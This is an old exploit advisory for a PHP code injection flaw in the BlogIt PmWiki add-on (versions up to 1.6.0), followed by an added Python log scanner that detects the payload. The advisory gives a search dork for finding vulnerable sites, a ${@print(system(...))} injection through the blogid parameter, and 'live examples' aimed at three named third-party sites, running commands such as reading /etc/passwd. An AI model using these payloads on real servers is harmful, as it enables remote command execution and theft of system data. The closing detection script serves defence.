BlogIt <= 1.6.0 PHP Code Injection Vulnerability



EKU-ID: 648 CVE: OSVDB-ID:
Author: Ux0r Published: 2011-06-30 Verified: Not Verified


===================================================================
BlogIt <= 1.6.0 PHP Code Injection Vulnerability
===================================================================


#[+] Discovered By   : Ux0r
#[+] E-mail          : ux0r@live.com
#[+] Home            : http://ux0r.blogspot.com ~ http://mavi1.org
#[+] Message         : Greetings to the lamers trying to overwrite my old indexes. You made me laugh :)

Product : BlogIt
Version : <= 1.6.0
Site    : http://www.pmwiki.org/wiki/Cookbook/BlogIt
Dork    : "powered by blogIt"


 = Error in file Site.BlogList =

Affected markup (line 11):

text=(:includesection "#blog-yearly-archive-pagelist blogid={(bi_ifnull '{$bi_BlogId}' blog1)} status=publish,sticky":)

Vulnerable parameter: $bi_BlogId, reachable through the blogid request parameter


 = Exploit =

- http://site.com/path/Site/BlogList?blogid=${@print(...)}  ; ... => php code injection

	
 = Example =

- http://site.com/Site/BlogList?blogid=${@print(system('ls -la'))}

 = Live examples =
 
- http://schniertshauer.com/Site/BlogList?blogid=${@print(system('ls -la'))}
- http://dotdelimited.com/Site/BlogList?blogid=${@print(system('pwd'))}
- http://tognela.net/Site/BlogList?blogid=${@print(system('cat /etc/passwd'))}

 < Best wishes. 2011 >
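
 = Detection (added example) =

The following log check is an added example, not part of the original advisory or of BlogIt: it scans web access logs for requests whose blogid parameter carries the ${...} syntax shown under Exploit, including percent-encoded and double-encoded forms. The log format (common/combined), the allowlist for legitimate blog ids and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate blog ids are short tokens like the default "blog1".
VALID_BLOGID_RE = re.compile(r'[A-Za-z0-9_-]{1,32}')

# Constructed sample log lines (documentation IPs, the advisory's placeholder payload).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jun/2011:10:00:01 +0000] "GET /Site/BlogList?blogid=blog1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Jun/2011:10:00:05 +0000] "GET /Site/BlogList?blogid=%24%7B%40print(...)%7D HTTP/1.1" 200 7340',
    '203.0.113.9 - - [30/Jun/2011:10:00:09 +0000] "GET /pmwiki.php?n=Site.BlogList&blogid=%2524%257B%2540print(...)%257D HTTP/1.1" 200 7340',
    '203.0.113.4 - - [30/Jun/2011:10:00:12 +0000] "GET /Site/HomePage HTTP/1.1" 200 2048',
]

def fully_unquote(value, max_rounds=3):
    """Undo nested percent-encoding (%2524 -> %24 -> $), bounded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return (verdict, decoded_blogid), or None when no blogid is present."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # Match on the parameter, not the path, so both /Site/BlogList?blogid=
    # and pmwiki.php?n=Site.BlogList&blogid= URL styles are covered.
    for key, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if key.lower() != "blogid":
            continue
        value = fully_unquote(value)
        if "${" in value:  # PHP "${...}" expression syntax used in the advisory
            return ("injection", value)
        if not VALID_BLOGID_RE.fullmatch(value):
            return ("invalid", value)
        return ("ok", value)
    return None

def scan(lines):
    """Return [(line_number, verdict, decoded_blogid)] for every non-"ok" hit."""
    results = ((n, check_line(line)) for n, line in enumerate(lines, 1))
    return [(n, *r) for n, r in results if r and r[0] != "ok"]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same allowlist is the natural input check on the server side: a blogid that does not fully match it should be rejected before the page markup is evaluated.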